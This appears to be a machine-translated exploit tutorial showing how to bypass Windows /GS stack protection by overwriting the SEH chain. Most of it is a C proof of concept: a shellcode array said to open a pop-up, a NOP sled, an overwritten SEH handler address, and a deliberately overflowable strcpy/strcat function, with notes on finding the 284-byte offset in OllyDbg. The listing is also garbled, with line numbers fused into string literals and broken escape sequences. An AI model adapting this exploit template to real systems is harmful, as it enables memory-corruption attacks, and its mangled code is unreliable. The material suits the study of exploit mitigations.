OD: GS bypasing via seh

Use seh to bypass GS Protection

The GS mechanism does not provide protection for Seh, so the GS can be bypassed by attack exceptions.

The experimental environment is VMware: Windows 2000 SP4. This version has no effect on safeseh. Visual Studio 2005 project properties: release, disable Optimization

The Code is as follows:

1 # include <string. h> 2 char shellcode [] = 3 "\ xfc \ x68 \ x6a \ x0a \ x38 \ x1e \ x68 \ x63 \ x89 \ XD1 \ x4f \ x68 \ x32 \ x74 \ x91 \ x0c "4" \ x8b \ xf4 \ x8d \ x7e \ xf4 \ x33 \ XDB \ xb7 \ x04 \ x2b \ xe3 \ x66 \ xbb \ x33 \ x32 \ x53 "5" \ x68 \ x75 \ x73 \ X65 \ x72 \ x54 \ x33 \ xd2 \ x64 \ x8b \ x5a \ x30 \ x8b \ x4b \ x0c \ x8b "6" \ x49 \ x1c \ x8b \ x09 \ x8b \ x69 \ x08 \ XAD \ X3D \ x6a \ x0a \ x38 \ x1e \ x75 \ x05 \ x95 "7" \ xFF \ x57 \ xf8 \ x95 \ X60 \ x8b \ x45 \ x3c \ x8b \ x4c \ x05 \ x78 \ x03 \ XCD \ x8b \ x59 "8" \ x20 \ x03 \ xdd \ x33 \ xFF \ x47 \ x8b \ x34 \ xbb \ x03 \ xf5 \ x99 \ x0f \ xbe \ x06 \ x3a "9" \ xc4 \ x74 \ x08 \ xc1 \ xca \ x07 \ x03 \ xd0 \ X46 \ xeb \ xf1 \ x3b \ x54 \ x24 \ x1c \ x75 "10" \ xe4 \ x8b \ x59 \ x24 \ x03 \ xdd \ x66 \ x8b \ x3c \ x7b \ x8b \ x8b \ x59 \ x1c \ x03 \ xdd \ x03 "11" \ x2c \ xbb \ x95 \ x5f \ XAB \ x57 \ x61 \ X3D \ x6a \ x0a \ x38 \ x1e \ x75 \ xa9 \ x33 \ XDB "12" \ x53 \ x68 \ x77 \ X65 \ x73 \ x74 \ x68 \ x66 \ x61 \ x69 \ x6c \ x8b \ xc4 \ x53 \ x50 \ x50 "13" \ x53 \ xFF \ x57 \ xfc \ x53 \ xFF \ x57 \ xf8 "// a 168-byte pop-up window shellcode14" \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 "15" \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 "16" \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 "17" \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 "18" \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 "19" \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 "20" \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 "21" \ x90 \ x90 \ x90 \ x90 "/ /116 bytes of NOP, 168 + 116 = 28422 "\ x90 \ x90 \ x90 \ x90" // seh chain23 "\ x94 \ xfe \ X12 \ x00" // seh handler24; 25 void test (char * input) 26 {27 char Buf [200]; 28 strcpy (BUF, input); 29 strcat (BUF, input ); // destroy stack frame & throw exception30} 31 void main () 32 {33 test (shellcode); 34}

The test () function has a typical overflow vulnerability. strcpy at line 28 overflows Buf [], and the seh linked list will be overwritten when char * input is long enough; strcat () at line 29 () the stack frame is damaged and an exception is triggered.

The shellcode length must be determined through ollydbg debugging in advance. In the experiment, the first node of seh chain is 284 away from the Buf in the stack frame, and line 22-23 covers the first node of Seh.